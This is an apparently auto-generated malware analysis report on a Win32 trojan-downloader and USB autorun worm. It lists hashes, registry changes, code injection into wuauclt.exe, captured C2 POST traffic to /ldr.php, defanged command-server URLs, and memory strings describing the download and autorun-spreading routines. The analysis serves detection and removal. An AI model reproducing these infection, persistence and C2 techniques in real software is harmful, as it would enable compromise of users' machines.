HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.299377 (B) (Emsisoft), Gen:Variant.Kazy.299377 (AdAware), Trojan-Downloader.Win32.Moure.FD, GenericAutorunWorm.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Worm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e825e09d39048006e06ff102411dcefa
SHA1: 0f76319f450b6aa85347104f26ff925d0d3f6589
SHA256: edd826f3852fbac15d0243f66749f23bbf6ca12271430332ec0a28194141faef
SSDeep: 3072:EtI09c0hZrMhSKVzP0zwj84kWmLa/J1/XzDqpOlKv3lJRScIfGUg9RHj/lfqmaT:EI09c ySK90zwjyZSJFjDqWq3lJnzX5i
Size: 232960 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: no data
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:57416
%original file name%.exe:1332
The Trojan injects its code into the following process(es):
wuauclt.exe:57448
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process %original file name%.exe:57416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_install_\msiexec.exe (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0B2.tmp (1281 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0B2.tmp (0 bytes)
Registry activity
The process %original file name%.exe:57416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 B4 52 1C 1C A6 7F 13 D4 83 A4 57 16 A2 9E 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software]
"ImageBase" = "80 93 C5 35 4A 35 35 35 49 35 35 35 36 36 35 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_install_]
"msiexec.exe" = "msiexec"
[HKLM\SOFTWARE\Microsoft]
"0000000B" = "50 4B 03 04 00 EA 00 00 30 71 00 00 BC FC C2 2B"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 4B FC 2B EF 26 25 0B 8E D1 53 35 5F BA A4 D8"
Dropped PE files
MD5 | File path |
---|---|
7ed265b1caa48a7eeb2246bb365778d8 | c:\Documents and Settings\All Users\Local Settings\Temp\cctrrfvwz.pif |
7ed265b1caa48a7eeb2246bb365778d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_install_\msiexec.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:57416
%original file name%.exe:1332
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\_install_\msiexec.exe (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0B2.tmp (1281 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Hause
Product Name: Drenzag
Product Version: 5, 1, 8, 4
Legal Copyright: Copyright Radume(c) 2013
Legal Trademarks: Gioka(c)
Original Filename: Koda
Internal Name: Zdravka
File Version: 2, 1, 3, 2
File Description: Darko
Comments: Preshin
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 1495040 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 1499136 | 188416 | 188416 | 5.34055 | 31a279faf70559e66e2d1cff233a7c31 |
.rsrc | 1687552 | 45056 | 43520 | 4.16141 | 250da1d858559ae8657f0ba7551e01ed |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://a.sobea.in/lptycgtycgkosxbosxbfjnrvjnrvaeib | 50.116.32.177 |
hxxp://hzmksreiuojy.in/ldr.php | 195.22.26.254 |
hxxp://hzmksreiuojy.ru/ldr.php | 195.22.26.252 |
www.update.microsoft.com | 65.55.192.91 |
hzmksreiuojy.biz | 69.195.129.70 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /ldr.php HTTP/1.1
Host: hzmksreiuojy.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Connection: close
upqchSE8slDLE Bgn4KGIwiLrX8zUN68T3yqvhQu2TqetQn3qIy7Q6bpTfDUtYIftZ33Mx0PLwog9mY3qw==
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 16 Dec 2014 05:20:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8a6fcfa38b1f1fc92349b0a77bd76af7|"%local server IP%"|1418707232|1418707232|0|1|0
Set-Cookie: snkz="%local server IP%"
0..
POST /ldr.php HTTP/1.1
Host: hzmksreiuojy.in
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Connection: close
upqchSE8slDLE Bgn4KGIwiLrX8zUN68T3yqvhQu2TqetQn3qIy7Q6bpTfDUtYIftZ33Mx0PLwog9mY3qw==
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 16 Dec 2014 05:20:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6d2da922248a82e579d1e4af0c09337b|"%local server IP%"|1418707231|1418707231|0|1|0
Set-Cookie: snkz="%local server IP%"
0..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
wuauclt.exe_57448:
.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
true
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module:
= Process: %s
= Process:
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System
wuauclt.exe_57448_rwx_000A0000_00009000:
.code
.import
NtDelayExecution
ntdll.dll
GetWindowsDirectoryW
kernel32.dll
software\microsoft\windows nt\currentversion\windows
software\microsoft\windows\currentversion\Policies\Explorer\Run
ccX.dat
hXXp://8.8.8.8/xxxxxxxxx.php
hXXp://hzmksreiuojy.in/ldr.php
hXXp://hzmksreiuojy.ru/ldr.php
hXXp://hzmksreiuojy.com/ldr.php
hXXp://hzmksreiuojy.biz/ldr.php
hXXp://hzmksreiuojy.nl/ldr.php
POST /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
GET /%s HTTP/1.0
VVV.update.microsoft.com
GetProcessHeap
ws2_32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegSetKeySecurity
advapi32.dll
user32.dll
dnsapi.dll
KERNEL32.DLL
\system32\wuauclt.exe
\syswow64\svchost.exe
4%userprofile%
%s\cc%s.%s
)X
x.exe
wuauclt.exe_57448_rwx_003B0000_00005000:
software\microsoft\windows nt\currentversion\windows
software\microsoft\windows\currentversion\Policies\Explorer\Run
ccX.dat
hXXp://8.8.8.8/xxxxxxxxx.php
hXXp://hzmksreiuojy.in/ldr.php
hXXp://hzmksreiuojy.ru/ldr.php
hXXp://hzmksreiuojy.com/ldr.php
hXXp://hzmksreiuojy.biz/ldr.php
hXXp://hzmksreiuojy.nl/ldr.php
POST /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
GET /%s HTTP/1.0
VVV.update.microsoft.com
NtDelayExecution
ntdll.dll
GetProcessHeap
kernel32.dll
ws2_32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegSetKeySecurity
advapi32.dll
user32.dll
dnsapi.dll
4%userprofile%
%s\cc%s.%s
)X
x.exe
wuauclt.exe_57448_rwx_00400000_0000E000:
.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
true
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module:
= Process: %s
= Process:
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System
wuauclt.exe_57448_rwx_00900000_00013000:
.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb
URLDownloadToFileW
urlmon.dll
KERNEL32.dll
keybd_event
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
GetCPInfo
Worm65.DLL.dll
[.ShellClassInfo]
IconResource=%systemroot%\system32\SHELL32.dll,7
IconFile=%SystemRoot%\system32\SHELL32.dll
%System%\wuauclt.exe
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
hXXp://a.sobea.in/
hXXp://b.sobea.in/
hXXp://c.sobea.in/
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
%s\%s
%s.exe
Thumbs.db
desktop.ini
autorun.inf
Wkernel32.dll
%s\desktop.ini
%s\_W%s.init
%s\Thumbs.db
_W%s.init,krnl %s %s
%s\Removable Disk (%dGB).lnk
shell32.dll
%s\%s (%dGB).lnk
%sautorun.inf